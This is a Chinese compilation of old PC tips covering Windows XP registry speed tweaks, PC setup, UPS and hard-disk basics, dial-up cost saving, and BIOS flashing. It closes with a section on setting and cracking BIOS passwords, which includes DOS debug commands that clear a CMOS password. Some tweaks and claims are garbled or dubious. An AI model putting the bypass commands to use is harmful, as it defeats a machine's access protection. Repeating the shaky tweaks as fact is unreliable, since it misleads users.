4GL Informix 4GL源代码
669 Composer 669；UNIX Composer音乐模型文件；669磁道模块
#01 及更高的号 为计算机演示而扫描的一系列电影的图片文件编号方法
$$$ OS/2用来跟踪档案文件
@@@ 用于安装过程中的屏幕文件和用于Microsoft Codeview for C这样的应用程序的指导文件 。


拒绝停滞 全面提速Windows XP系统

《一键清理系统垃圾》

拒绝停滞 全面提速Windows XP系统

   Windows XP现在已经相当普及了，在使用它的过程中，你是否感觉在速度上很多地方还没有Windows 9x系统快呢？比如访问网上邻居、开机关机等，下面我们就来逐个提升它们的速度。

1、加速网上邻居
   在Windows XP中访问网上邻居是相当恼人的，系统会搜索自己的共享目录和可作为网络共享的打印机以及计划任务中和网络相关的计划任务，然后才显示出来，显然这样速度就会比Windows 9x中慢很多。其实这些功能我们并没有使用上，与其不用还不如删除它们，这样速度就会明显加快。打开注册表编辑器，找到HKEY_LOCAL_MACHINE/sofeware/Microsoft/Windows/ Current Version/Explore/RemoteComputer/NameSpace，删除其下的{2227A280-3AEA-1069-A2DE08002B30309D}(打印机)和{D6277990-4C6A-11CF8D87- 00AA0060F5BF}(计划任务)，重新启动电脑，再次访问网上邻居，你会发现快了很多。

2、减少开机滚动条时间
   每次启动Windows XP，蓝色的滚动条都要走上好多次，其实这里我们也可以把它的滚动时间减少，以加快启动速度。打开注册表编辑器，找到HKEY_LOCAL_MACHINE＼SYSTEM＼CurrentControlSet＼Control＼Session Manager＼Memory Management＼PrefetchParameters，在右边找到EnablePrefetcher主键，把它的默认值3改为1，这样滚动条滚动的时间就会减少。

3、加快开机速度
   在XP中关机时，系统会发送消息到运行程序和远程服务器，告诉它们系统要关闭，并等待接到回应后系统才开始关机。加快开机速度，可以先设置自动结束任务，首先找到HKEY_CURRENT_USER＼Control Panel＼Desktop，把AutoEndTasks的键值设置为1；然后在该分支下有个“HungAppTimeout”，把它的值改为“4000(或更少)，默认为50000；最后再找到HKEY_LOCAL_MACHINE＼ System＼CurrentControlSet＼Control＼，同样把WaitToKillServiceTimeout设置为“4000”；通过这样设置关机速度明显快了不少。

4、去掉菜单延迟
   为了达到视觉上的真实感，Windows XP中的菜单在打开时会有滑出的效果，但这也会延缓打开速度。我们可以在HKEY_CURRENT_USER＼Control Panel＼Desktop下找到“MenuShowDelay”主键，把它的值改为“0”就可以去掉菜单延迟效果。

5、提高宽带速度
   专业版的Windows XP默认保留了20%的带宽，其实这对于我们个人用户来说是没有什么作用的。尤其让它闲着还不如充分地利用起来。
   在“开始→运行”中输入gpedit.msc，打开组策略编辑器。找到“计算机配置→管理模板→网络→QOS数据包调度程序”，选择右边的“限制可保留带宽”，选择“属性”打开限制可保留带宽属性对话框，选择“禁用”即可。这样就释放了保留的带宽，对于上网的朋友是非常有用的。


认识“我的电脑”

《一键清理系统垃圾》

认识“我的电脑”

   有个笑话说领导为了表明单位的电脑是公有财产，勒令职工把“我的电脑”都改成“大家的电脑”。这里的“我的电脑”是指桌面上的图标，你了解它么？
   对于桌面上的图标，我们都采用双击鼠标的方式打开。表面看起来，这几个图标都差不多，尤其是中间的几个。我们还是逐一破解吧。
   1.软盘
   那些A、C、D、E等等都称为“盘符”。A盘通常都是指软盘。之前的“3.5”是指软驱能够读取3.5英寸、1.44MB的软盘，以前曾经有过“5寸盘”之说，指的是能够读取5.25英寸软盘的软驱，不过现在已经基本淘汰了，这也是现在一般没有B盘的原因。把一张软盘插入软驱（不要插反了呀）之后，双击这个图标就可以显示软盘中的内容了。
   2.光盘
   不好说光盘是哪个盘符，因为每台计算机的设置可能不一样。不过光盘有个显眼的标志，保证大家能一眼认出来。看到了么？将光盘放入光驱之后，有的光盘可能会自动启动；但是另一些不会，想看光盘里的内容，就来双击这个光盘图标吧。
   3.硬盘
   一般来说，介于“软盘”和“光盘”之间的几个盘符就是硬盘。我们常常把硬盘分为好几个区域，便于存放不同的东西。所以有了C盘、D盘等等。记住，这并不代表你有很多硬盘。
   4.可移动磁盘
   现在人们对数据量的需求越来越大，因此很多人都购买了闪存盘或者移动硬盘。都归为“可移动磁盘”，通常显示在光盘的盘符之后。
   5.控制面板
   “我的电脑”中最与众不同的图标应该是“控制面板”了，文件夹中居然还装着锤子很像工具箱，里面的“工具”就是我们控制电脑的利器！没事的时候自己摸索摸索吧!


认识UPS

《一键清理系统垃圾》

认识UPS

   由于不稳定的电源品质，经常造成电脑设备的硬件损坏、宝贵数据的丢失，因此UPS已渐渐成为购买电脑设备时不可缺少的标准配备。然而如何选购UPS却成为经常困扰用户的一个重要问题。因此，笔者把在销售过程中，客户经常提出的疑问加以整理，并提出解答，希望有助于读者选购UPS。
   一、何谓UPS?
   这是一般第一次接触UPS客户最常问的一个问题。UPS的英文名称是Uninterruptable Power System，简称UPS。而所谓的UPS，顾名思义，就是当停电时能够接替市电持续供应电力的设备，就如同紧急照明设备一样，但UPS的容量更大、反应更快、应用更广、设计更精密。
   二、UPS用于何处?
   当市电突然发生中断时，UPS可用于紧急取代市电，且因为容量有限，故一般均应用于保护重要设备，如电脑设备、消防设备、医疗仪器等。当然UPS也有其使用上的限制，尤其是电感性负载，像电风扇、冷气机等家电均不适用，这是因为电感性负载会产生反电动势。此外启动电流较大的设备也不适用，因为它过大的启动电流将造成UPS的误动作。
   三、为何要使用UPS?
   我们以电脑为例来说明这个问题。今天如果没有使用UPS，那么当市电发生异常，将造成电脑宕机，甚至造成硬件故障，到时维修费将不可低估；硬件的故障可花钱维修，但是存于硬盘中的信息呢？那可是有钱也买不到的。因此，为您的设备添购UPS，就如同买保险一样，有备无患。这里必需附带说明的是，UPS并不是只有当停电时才发挥作用，当出现市电异常，如市电电压过低、过高、浪涌、尖峰信号、线路噪音等足以影响设备正常运作的电源品质时，UPS都会发挥作用。由此，UPS的重要性可见一般。
   四、UPS是如何工作的？
   UPS的供电原理是当市电正常时，机器会将市电的交流电转为直流电，而后对电池充电，以备电力中断时使用；一旦当市电发生异常时，再将储存于电池中的直流电转换为交流电，供给负载继续使用，达到不断电功能。这里需要强调的是UPS并不是停电时才会动作，如遇到电压过低或过高、瞬间浪涌等足以影响设备正常运转时，UPS均会动作，给设备提供稳定且干净的电力。


认识你的电脑

《一键清理系统垃圾》

认识你的电脑

电脑的正确安装与连接

认识你的电脑

   恭喜你，现在有了属于自己的电脑！也许目前这只是预算，但了解、认识电脑，是学习并掌握它的第一步。
   面对着这个期盼已久的家伙，你可能有些紧张，或者迷惘，不知该怎么做。不必紧张，请放松一下，跟着我，一步一步地将它“安置”好。
   首先，你应该准备好一些很必要的设备，来安置、安装你的电脑。一张平稳的、面积足够大的工作台是必不可少的，当然最好是专用的电脑桌。一张清理干净的写字台也可以成为代用品。请将这个工作台放到墙边，离它不远的墙壁上要有一个220V、50Hz的电源接口。然后是一块接线板(电源插座)，这也是很必要的配件，一台电脑需要大约三个独立的电源插座，你不可能把电源线都直接插到墙上。最好再有一把十字螺丝刀，也许你会用得上它。
   在做好上述准备后，我们就可以开始了！

取出电脑部件

1. 区分主机和显示器
   摆在你面前的是两只箱子，一只箱子装的是电脑主机，另一只装的是显示器。一般来说，装显示器的箱子基本上呈正方体，而装主机的箱子一般为长方体形状。

2. 取出主机
   打开装有主机的箱子，你可以取出主机。拿掉用于包装和减震的发泡填充物和塑料口袋，把主机平稳地放到工作台上。检查一下包装箱里面，还有许多好东西。一个扁长的匣子里装的是键盘，请将它打开取出键盘并放到主机旁边。一个电脑附件包，虽然你现在用不上它，但你一定要把它保管好，对于你的电脑来说，它是非常重要的。还有两根电源线，一根是主机的电源线，一根是显示器的。最后，还有一只可爱的鼠标，这是你一刻也离不开的输入设备。请将它放到键盘的右边，这个位置便于使用。

3. 取出显示器
   显示器是电脑的最主要的输出设备，电脑的一举一动都会显现在显示器上。
   显示器是电脑里比较“娇气”的部件，而且很笨重，打开它时操作要小心。取出显示器时，可能会因份量重、包装紧凑而不易取出。有一个很巧妙的办法：打开包装封条，将这一端包装打开，然后将整体翻转180°轻轻扣在地上，这样很容易取下包装，最后将显示器放到工作台上。

连接各部件

   接下来，我们就要把桌面上的各个部件连接到一起了，这对于从未接触过电脑的你来说，似乎感觉无从下手。那么，让我们先从认识电脑的接口入手，逐步把电脑的各个部件连接成一个整体。
   千万要注意，在下面这个操作过程中，要保证电脑始终处于不加电状态，即不要打开电源插座开关。为保险起见，请暂时不要将电源插座连接到墙上的电源接口。

1.认识主机接口
   首先，请把你的主机转过来，我们要仔细讲解位于其背后的各种接口。所有的电脑外部设备，都是通过这些接口来连接到电脑上的。初次看到这些接口，你可能会觉得眼花缭乱，不过你不必心急。
   在认识了电脑背面的各种接口后，你可以逐步把其他部件连接在一起了。

2.连接鼠标和键盘
   鼠标和键盘是电脑中比较简单的配件，连接起来非常简单，我们就从这里下手吧。
   将鼠标放到便于使用地方，将接口插入主机背面的鼠标接口。插的时候要注意方向，并且稍微用力，直至键盘。
   接下来把键盘连接到主机上，操作方法同连接鼠标一样。只是注意键盘和鼠标所插的接口不要搞反，否则它们都将无法正常工作，但不会毁坏设备。

3. 连接显示器
   显示器需要连接两根线才能工作。一条是传输数据的信号线，另外一条当然是保证显示器独立工作的电源线。
   一般情况下，信号线一端已经固定在显示器上，另一端是独特的内含三排针头的梯形接口，不会搞错。将它插到主机背部相应的显示器接口，插实插牢，然后将接口两端的紧固螺钉拧紧即可。
   接下来，我们把显示器的电源也接好。显示器的电源线不像信号线那样本身固定在显示器上，而是独立的。拿到电源线，很容易区分出哪一端应连接到显示器上，哪一端应连接到电源插座上，然后将其连接到相应的位置。

4.连接主机电源
   完成了所有的上述操作，最后我们来将主机的电源连接到电源插座上，一定要插牢，保证接触良好。接触不良的电路不但会影响电脑的正常工作，甚至还会造成电脑硬件损坏。
   好了，现在让我们静下心来，再仔细检查一下前面的操作有没有问题？如果确认连接正确，现在就把电源插座的接头连接到墙上的电源插孔。至此，连接工作顺利结束。

让电脑运转起来
   当电脑安全连接好后，你可能会强烈地希望打开电脑。那好吧，我们一步一步来。
   首先，请检查好电源插座的连接，并将其开关打开。

1. 了解显示器的操作
   找到显示器的开关键，轻轻按下即可打开显示器。

2. 认识主机
   有了对电脑有了一个初步的认识，剩下的任务就是轻轻按动主机电源开关，就可以打开并使用你的电脑了。

< 常见误解 >
电脑什么都能干
   电脑能为人们做很多事，我们可以用它打印文件、收发传真、进行财务管理，可以听音乐、看电影、玩游戏，可以连接互联网，可以和全世界的朋友聊天，还能以非常便宜的价格打国际长途电话呢！电脑能为你做很多事，就看你怎么使唤了。不过，电脑不能替你写毕业论文，它也不能让你在股市上成为“常胜将军”，毕竟它要听命于人们事先设定的程序的指挥。它不是上帝，并不是万能的。

< 补充信息 >
附件包里装的是什么
   每台新的电脑里都会有一个附件包，主要有以下几个重要的物品组成：
1.产品说明书，也就是这台电脑的详细介绍；2.质保证书，当你的电脑出现故障时，需要凭这张质保证书才能获得厂商的售后服务以及免费维修；3.驱动程序，这也许是附件包里最重要的东西了，因为你的电脑包含了很多部件，这些部件各有各的驱动程序，只有装好了驱动程序它们才能正常工作。一般情况下，这些驱动程序在出厂时厂家已经替你安装好了，所以你暂时并不需要它们，但一旦你的系统出现问题，你就离不开它们了。

< 补充信息 >
认识设备接口
   所有的外部设备，都是通过接口连接到主机上进行工作的。接口这一概念包含两方面，一方面是主机端，我们在前面已经做了介绍，另一方面是设备端，两端互相匹配使用。常见接口有以下几种。
   1. 串口，用于连接低速设备，多为9针，也有17针和25针串口。
   2. 并口，用于连接高速设备，为25针。
   串口和并口的连接部分都有一圈梯形金属外皮，所以在与主机连接时，不会让你在插接方向上产生迷惑。接口与主机连结部分还有插针(俗称公口)与插孔(俗称母口)两种方式，很容易辨别。
   3. USB接口，一种新型的、速度更快、连接更方便的接口，它的样子比较特殊，非传统的插针或插孔接触方式。
   此外，还有比较特殊的显示器专用接口及PS/2鼠标、键盘专用接口等。


认识硬盘

《一键清理系统垃圾》

认识硬盘

   一说起硬盘，您一定不感到陌生，我的Windows 98就安装在硬盘上，还有我的硬盘是2.1G的，上面装了好几个游戏呢！
   的确，电脑要是没了硬盘，不知道它还能做些什么。硬盘与其他记录介质相比，它的速度快、容量大，成为计算机中最重要的存储设备。
   IDE和SCSI:
   硬盘按其接口类型，主要有IDE和SCSI两种。IDE接口有40针，最初是为AT结构的电脑设计的，又称为ATA接口。标准IDE接口只支持两个设备，每个硬盘的最大硬盘空间也只能到528M字节；现在普遍使用增强型IDE(EIDE)标准，它最多可支持4个设备，支持大容量的硬盘。SCSI接口的诞生比IDE晚，相应SCSI硬盘有许多先进的特性，比如支持的硬盘容量更大、传输速率更高、可管理的设备更多等等。
   SCSI硬盘和IDE硬盘除接口不同外，在组织结构、工作原理上是相同的，我们将主要介绍IDE硬盘。
   硬盘尺寸有很多种，现在普遍使用的是3.5英寸硬盘，大小和3寸软驱相仿。除此之外，还有5寸硬盘以及2.5寸或体积更小的硬盘，小体积硬盘常用于笔记本电脑中。


如何节省网费

《一键清理系统垃圾》

如何节省网费

   随便问一个上网的朋友最头疼的是什么，肯定会说网费太高，现在虽然网费一降再降，但总是不能让人接受，不上吧，那不行，这不等于要我的命吗？上吧，唉！……有什么办法能在有限的上网时间里做更多的事呢？本人倒有些建议。
1. 经常摘抄一些有用的网址。上网前要有计划。先打开浏览器和E－mail的窗口，电子邮件写好后再拨号上网。这些准备工作日久天长积累起来，可以为您节省一笔可观的上网费用。
2. 由近及远的访问原则。一般距离越远则传输速率越慢。应了解本地及附近网络的资源分布情况，大部分优秀软件都会被ISP下载到本地服务器上，如世界著名软件库镜像http：//tucows. q z.fj.cn，何必费时间跑到国外去呢？
3. 很多网迷们喜欢在网上聊天。如果能利用这段时间干别的事的话不就可以省很多网费吗。本人就是这样一边聊天一边下载想要的软件，等我聊完了，软件呢，自然也就下载完了，一举三得，既聊了天又下载完了软件，而且还省了网费，何乐而不为呢。
4. 关闭节能设置。联线上网间隔一定时间时Modem总是断线，有可能是高级电源管理设定的节能时间干扰，最好将其关闭。
5. 一石多鸟。Modem在实际应用中难以达到全速，应充分利用Windows 9X的多任务性和网络传输间隔，多开浏览窗口同时进行传输。尤其是在进行文件传送时，可同时进行浏览主页等工作，以提高上网效率。前提是内存足够多、Modem足够快。另外，文件上传时记住应先进行压缩。
6. 把握好上网时间。上网费用包括网络使用费和市内电话费两部分。节省网络费用要通过提高网络传输速率、缩短上网时间来实现。比较合适的上网时间应是节假日的白天，当然有过清晨6—7点上网历史的朋友肯定会发现，这一时段的速率确实让您激动不已。另外，不要忘记查看您每个月的上网时间，尽量保证既不超时，也不少时。
7. 使用离线工具。网上阅读会浪费您大量的网时，对于需要详细阅读的网页，在文件传输结束后应立即脱离，下网后使用Secyrt Agent等离线浏览仔细阅读。离线新闻阅读器Free Agent可以让您离线阅读新闻组的内容，并写好讨论文章，上网时再粘贴进去，节省了大量的网时。
8. 下载文件的技巧。如果下载的文件比较大，可以集中一下上网要做的事情，以保证要做的事完成时文件传输也结束了。当然，如果使用支持断线续传的FTP软件Cute FTP，就不会有这个问题了。还有，当文件有多个站点可供下载时，应选择传输速率高的站点。
9. 为了避免遇到网上的“塞车”时段，最好装备一套如TCPSPEED之类的网络测速软件。有了它，就可以像听交通新闻一样，随时知道网上的“交通状况”，根据“路况”信息，轻易地选择自己的上网时间段。
10.选择一款好的网络加速软件。网络速率慢，在国内早已是一个不争的事实。所以，选择一款好的网络加速软件就非常重要。如果是喜欢在网上跑来跑去的新网民，可以使用PEAKJET，作为链接型网络加速器的经典，其下载速度无可匹敌；如果是那种天天访问相同站点的老网民，SURFEXPRESS将是首选，作为历史回顾型网络加速器的“大哥大”，它可不是徒有虚名哦！那谁是超级网虫的最佳拍档呢？当然非Netsonic莫属了。它作为链接型和历史回顾型加速器的完美结合体，为各种类型网民所喜爱。
11.初级网虫慢慢会发现自己在网上是没有时间概念的，所以钱包也随着时间渐渐地瘪下去。解决的办法很简单：只要装备一套像ENCOUNTER这样的网络计费器，上网时它会显示上网费和电话费，绝对是忠实的小会计。
12.将“猫”设为最快速度——921600，并设为仅以该速度链接。由于速度定为最快后容易掉线，请将调制解调器属性栏的高级链接设置里的附加设置写成S1－＝255，就可防止掉线。
13.善于使用向导。初到网上的人就好像进入了迷宫，不知该怎么走才能到达目的地，这时就需要向导了。向导就是“搜索引擎”。目前网上各类“搜索引擎”很多，如国内的网易、Yeah，Cseek、“搜狐”等，国外的中英文Yahoo、Excite等。
14.充分利用收藏夹。可以节省输入网址的时间。具体操作是打开书签编辑窗口——“添加到收藏夹”，再按照你的兴趣和需要填写对话框之后，点击“确定”。


刷新BIOS以及失败后的解决方法

《一键清理系统垃圾》

刷新BIOS以及失败后的解决方法

１、如何刷新BIOS以及失败后的解决方法；
２、设置BIOS密码以及密码的破解；
３、BIOS响声的含义。

一、关于BIOS的升级

    一）、怎样升级/刷新 BIOS

   目前市场上的主板 BIOS 主要有 Award BIOS AMI BLOS Phoenix.BIOS 三种类型 而Award BIOS 是由 Award Software 公司开发的 BIOS 是主板 BIOS 中应用最广泛的一种 BIOS这些信息我们可在开机信息的第一行得知 如 Award Modular BIOSV4.51G 就告诉我们这是 Award BIOS 版本是 4.51 您只要从网上下载对应主板型号的最新版 BIOS 文件 在纯DOS 状态下从软盘运行 Awdflash.exe 然后根据提示一步步做下去就可以顺利完成主板 BIOS的更新 一般说来这个过程不会超过两分钟就可以搞定

Awdflash.exe 的各种参数使用说明

/?　　　显示帮助信息
   /py　自动完成 BIOS 的刷新任务
   /sy　备份原来的 BIOS 到磁盘
   /sb　在升级 BIOS 时强行跳过 BootBlock 模块
   /cp　在刷新结束后清除即插即用数据 ESCD
   /cd　在刷新 BIOS 结束后清除 DMI 数据
   /r　 在刷新 BIOS 结束后自动重启动
   /pn　不运行升级程序
   /sn　不备份系统老的 BIOS 文件
   /sd　保存 DMI 数据到一个文件
   /cks　 在更新 BIOS 时显示备份文件的数据
   /tiny　 只占用很少的内存
   /e　刷新结束后自动回到 DOS 命令行状态
   /f　刷新时使用原来的 BIOS 数据
   /ld　在刷新结束后清除 CMOS 数据并且不重新引导系统
   /cksxxxx　 将老的备份 BIOS 文件与新的 BIOS 文件进行比较校验
   从理论上来讲 升级主板 BIOS 和升级硬件驱动程序的一样 假如您完全按照正确步骤进行 一般是不会出事的 不过人算不如天算 一些我们不注意的细节或其他意想不到的事情 都有可能导致意外出现 升级 BIOS 的经验总结了以下几种最常见的失败原因供各位参考
   1　在写入新 BIOS 的过程中突然断电
   2　升级用的启动软盘上有坏块
   3　刷新程序强行刷新 BootBlock 引导模块
   4　BIOS 文件自身损坏 比如感染了病毒
   升级成功固然爽 可是万一升级失改 Awdflash.exe 就又可以大显身手了 看到上参数中有下划线的那行了吗 对 在升级 BIOS 时使用/SB 参数 这样升级程序将会强行跳过主板 BIOS 中的 BootBlock 引导模块 的刷新 只有在升级 BIOS 时使用/SB 参数后 我们才可以利用未被破坏的 BootBlock 来恢复升级前的 BIOS 数据 否则可能无法恢复 即使您手中有紧急恢复盘也无效 我们只需要利用拷贝有 Awdflash.exe 和*.bin 的启动盘启动系统 最好软盘中建有内容为 Awdflash.exe *.bin/sn/py 的 Autoexec.bat 文件 这样可以免得进行盲操作或寻找 ISA 显卡的麻烦 假如 BootBlock 未被破坏 我们就可以看到软驱的灯是亮着的 而且软驱也在读盘 待灯熄后 BIOS 的就算成功了 重启后应付地一切。

二）、如何降低升级BIOS的危险：

升级主板的BIOS基本上都是以下几步：

(1)从网上下载升级软件

(2)解压软件，生成一个执行文件和一个包含BIOS升级的文件

(3)制作一个DOS6．22的启动软盘，把上述两个文件拷入软盘中

(4)用软盘启动，运行软盘中升级BIOS的执行文件，完成升级。

分析起来，第(4)步――在软盘中运行执行文件的潜在危险最大。 一些朋友由于软驱老矣，或很容易使用质量不过关的软盘，极易在升 级中出现读盘错误。如果只是在DOS启动时或运行执行文件时报错， 还可以重来；但是，如果在读取BIOS升级文件时出错，那就会造成主 板因BIOS数据错误而报废，损失可谓大矣！我在前不久升级BIOS的过 程中，实行了“软盘启动，硬盘升级”的办法，最大程度地降低了因 软盘错误而造成的损害。现提供给广大朋友。

    我的主板是微星6119W，原来的BIOS是AMI简体中文1.2版。

    1. 从微星网址 http://www.msi.com.tw下载支持PⅢ的AMI简体中
文1.3版，文件名为a619c313.exe。

    2. 运行a619c313.exe，得到四个文件：BIOS升级文件a619c313.rom，BIOS 升级文件说明a619c313.txt，BIOS升级执行文件amifl814.exe，BIOS 升级执行文件说明flash。仔细看BIOS升级文件说明。

    3. 制作一个DOS6．22的启动盘。

    4. 重启计算机，按Del进入BIOS设置，在CMOS CHIPSET FEATURE SETUP中，将SYSTEM BIOS CACHEABLE和VIDEO BIOS CACHEABLE项 禁止掉。并选择从软盘启动。

    5. 从软盘启动，记住出现“Staring MS-DOS...”时按F5跳过
config.sys和autoexec.bat。

    6. 进入硬盘，运行BIOS升级执行文件amifl814.exe，进入“File” 选项，把你需要保存的旧BIOS文件取名为“old.rom”，保存在A盘； 把需要执行的BIOS升级文件“a619c313.rom”和在硬盘上的路径写清 楚。

    7. 运行“Go head”，对BIOS进行升级。

    8. BIOS升级完成后会自动重启计算机，然后报告CMOS设置错误， 按Del进入BIOS重新设置即可。

    采取以上办法升级，有两个好处：(1)不会因软驱或软盘的错误而 导致BIOS写入失败；即使软驱或软盘出错，最多只会影响开始时操作系统的引导。(2)从硬盘运行BIOS升级文件快速、可靠：一般不存在读 盘错误；缩短了时间，减少了可能发生的停电危险。

  三》、何为 BIOS 热拔插法

   所谓的 热拔插法 是指在开机的情况下通过替换 BIOS 芯片的方法恢复损坏的 BIOS的操作方法 首先 找一台主板型号与您的完全一致的完好的机器 将它引导至安全的 DOS方式下 然后轻轻地拔下好的 BIOS 芯片 再将您的 BIOS 插到主板上 最后依照上面讲述的步骤将您的原来备份好的 BIOS 数据文件恢复到 BIOS 芯片中 这样 您的 BIOS 就重获新生了 在这里要提醒大家的是 在热拔插的过程中动作一定要轻 否则如果损坏 BIOS 芯片的引脚就很麻烦了 最好的方法是先在关机的情况下将好的 BIOS 芯片拔出 然后再插回去注意不要插得太紧 然后进行上面介绍的热拔插法 以确保安全 如果您找不到一样的主板可以找一块其他的可以正常工作的主板 用上面的方法重写 BIOS 但要屏蔽掉 BIOS 版本和主板不一致的检查 方法是带参数执行写入程序 比如 Award 是 awdflash *.bin/py *.bin是要写入的 BIOS 数据文件名 热拔插法这种方法可能是目前最流行的方法了 要求的技术能力较高 所以如果您对计算机硬件不是很熟的话 就最好请一个高手来做 否则会将那颗好的 BIOS 芯片也损坏。

如何修复被损 BIOS？

常听说升级 BIOS 要小心 但是我小心后还会失手 那失手后怎么办呢？
   如您所说 一定要小心 但是万一运气太差 升级中途断电也是有可能发生的 这时BIOS 就肯定被损坏了 遇到这样的情况 您可以与主板制造商联系 换一块新 BIOS 芯片或者用下面两招试一下自己修复 BIOS 芯片

   第一招 借鸡下蛋 用完好的 BIOS 芯片启动计算机

   用一片与您的 BIOS 完全相同的 能工作的 BIOS 启动计算机系统 然后换上刻坏的 BIOS进行操作 将正确 BIOS 码写入 BIOS 芯片中 打开机箱后 拆下主板 找到 BIOS 芯片 通常 BIOS ROM 是主板上惟一贴有标签的芯片 是双列直插式封装 希望您能用芯片拔起器来拔起刻坏的芯片 没有也没关系 用一字螺丝刀 记着要轻 慢 左右两边用力均衡就能搞定了 然后将好的芯片对准插座轻轻压入 开机进入 BIOS 系统参数设置程序 BIOS FeaturesSetup 一项中 开启所有 ROM 映射功能 要求 System BIOS Cacheable 一项为 Enable 即映射当前 System BIOS 到 RAM 当中去 然后得新用软盘启动计算机进入 DOS 状态 运行与您主板相应的 BIOS 刻录程序 并在程序中要求备份当前的 BIOS 程序 不要关闭计算机。
   按前面的拔起方法将刻坏的BIOS芯片替换下正常的BIOS芯片 内存驻留的System BIOS程序将支持硬件的正常运行 计算机系统不会产生任何混乱 此时继续运行刻录程序 用储存下来的 BIOS 程序更新 BIOS 稍待片刻 BIOS 源代码会写入芯片 如果提示出的更新字节数与您的 ROM 块容量相等 BIOS ROM 就起死回生了 我们只要关机重新启动即可。

   第二招 借尸还魂 用 Boot Block 引导块恢复 BIOS 芯片

   其实在 BIOS 中 有一个引导块 Boot Block 当时行 BIOS 升级时 这一区块一般是无法覆盖的 某些主板在升级程序写入之前会提示您是否覆盖引导区 Update BIOSIncluding Boot Block and ESCD 保险起见 请选 N 那么在写入失败后 BIOS 中仍然有能力启动系统 不过 BIOS Boot Block 只支持软驱和 ISA 显卡 如果您的计算机安装的是 PCI 显卡的话 启动电脑后应付地出现黑屏 但软驱仍能运作。
   升级失败后 我们首先在别的机子上制作一张启动盘 并将写入程序及正确的 BIOS 升级数据拷贝在启动盘上 然后用这张软盘启动计算机 执行写入程序即可恢复 BIOS 中的内容 如果计算机安装的是 AGP 或 PCI 显卡 就必须按照重写 BIOS 的步骤 摸黑 操作了只要保证键入内容无误 电脑仍能正常恢复.

二、关于BIOS的密码

  一》、计算机中有如下常见密码：

    1、屏幕保护程序密码；
    2、软件和文件权限密码；
    3、网络方面的权限密码；
    4、BIOS权限密码；

以上密码要数“屏幕保护程序密码”的设置和解除最容易；文件和网络方面的密码破解最难；BIOS密码最值得计算机用户探究。

    BIOS 基本输入/输出系统。BIOS设置俗称“CMOS设置”，即用固化在主板上的ROM中的工具程序BIOS去修改计算机的各项参数，以影响计算机的功能和使用权限。BIOS密码也称“CMOS密码”，密码设置的主要目的有：

    1、防止他人随意修改BIOS设置，以保证计算机的正常运行。
    2、限制他人使用计算机，以保护计算机中的资源。

    二》、密码设置方法

    BIOS版本虽然有多个，但密码设置方法基本相同。现以Award 4.51 PG版本(如下图)为例。在计算机启动过程中，当屏幕下方出现提示：“Press DEL to enter SETUP”时按住Del键便可进入。

    方法是: 开机时,当屏幕下方出现提示“Press DEL to enter SETUP”时按住Del 其中与密码设置有关的项目有：

    “BIOS FEATURES SETUP”（BIOS功能设置）
    “SUPERVISOR PASSWORD”（管理员密码）
    “USER PASSWORD”（用户密码）

    选择其中的某一项，回车，即可进行该项目的设置。选择管理员或用户密码项目后回车，要求输入密码，输入后再回车，提示校验密码，再次输入相同密码，回车即可。需要注意的是，进行任何设置后，在退出时必须保存才能让设置生效。（保存方法是：设置完毕后选择“SAVE & EXIT SETUP ” 或按F10键，出现提示“SAVE to CMOS and EXIT(Y/N)?此时按下“Y键”，保存完成。）

    具体设置分以下几种方法：

    设置方法1：单独设置“SUPERVISOR PASSWORD”或“USER PASSWORD”其中的任何一项，再打开“BIOS FEATURES SETUP”将其中的“Security Option”设置为“Setup”，保存退出。这样，开机时按Del键进入BIOS设置画面时将要求输入密码，但进入操作系统时不要求输入密码。

    设置方法2: 单独设置“SUPERVISOR PASSWORD”或“USER PASSWORD”其中的任何一项，再打开“BIOS FEATURES SETUP”将其中的“Security Option”设置为“System”，保存退出。这样，不但在进入BIOS设置时要求输入密码，而且进入操作系统时也要求输入密码。

    设置方法3：分别设置“SUPERVISOR PASSWORD”和“USER PASSWORD”，并且采用两个不同的密码。再打开“BIOS FEATURES SETUP”将其中的“Security Option”设置为“System”，退出保存。这样，进入BIOS设置和进入操作系统都要求输入密码，而且输入其中任何一个密码都能进入BIOS设置和操作系统。但“管理员密码”和“用户密码”有所区别：以“管理员密码”进入BIOS程序时可以进行任何设置，包括修改用户密码。但以“用户密码”进入时，除了修改或去除“用户密码”外，不能进行其它任何设置，更无法修改管理员密码。由此可见，在这种设置状态下，“用户密码”的权限低于“管理员密码”的权限。

    三》、密码实用

    密码虽然最多只有两个，但若能合理巧妙地加以运用则益处多多。

    1、公共场合的计算机：如学校机房、办公室等。一般采用“设置方法1”，密码不公开，此时允许他人进入操作系统使用计算机，但不允许他人进入BIOS画面随意修改BIOS 设置，以保护计算机的正常运行。

    2、个人计算机，若不想让其它任何人使用：一般采用“设置方法2”，密码不公开，此时他人无法进入BIOS设置，也无法进入操作系统。

    3、个人计算机，但允许指定的几个人使用：一般采用“设置方法3”??分别设置两个密码，并将“用户密码”告知指定的使用人，自己保留“管理员密码”。若日后想取消他人的使用资格，可进入BIOS将原先的“用户密码”取消或修改掉。而他人却无法修改“管理员密码”，这样，主动权仍然在自己手里。

    四》、密码的去除与破解

    密码固然有保护作用，但若自己忘了密码却会带来麻烦。因此，除了会设置密码外，更要学会去除和破解密码。

    1、密码的去除：

    密码的“去除”是指在已经知道密码的情况下去除密码。

    方法是：进入BIOS设置画面，选择已经设置密码的“SUPERVISOR PASSWORD”或“USER PASSWORD”，回车后，出现“Enter Password”时，不要输入密码，直接按回车键。此时屏幕出现提示：

    “ PASSWORD DISABLED ！！！（去除密码！！！）
    Press any key to continue……（按任意键继续……）”

    按任意键后退出保存，密码便被去除。

  2、密码的破解：

    密码的“破解”是指在忘记密码，无法进入BIOS设置或无法进入操作系统的情况下破解密码。方法如下：

    （1）程序破解法：

    此法适用于可进入操作系统，但无法进入BIOS设置（要求输入密码）。具体方法是：将计算机切换到DOS状态，在提示符“C：WINDOWS〉”后面输入以下破解程序：

    debug
    - O 70 10
    - O 71 ff
    - q

    再用exit命令退出DOS，密码即被破解。因BIOS版本不同，有时此程序无法破解时，可采用另一个与之类似的程序来破解：

    debug
    - O 71 20
    - O 70 21
    - q

    用exit命令退出DOS，重新启动并按住Del键进入BIOS，此时你会发现已经没有密码挡你的道了！

    （2）放电法：

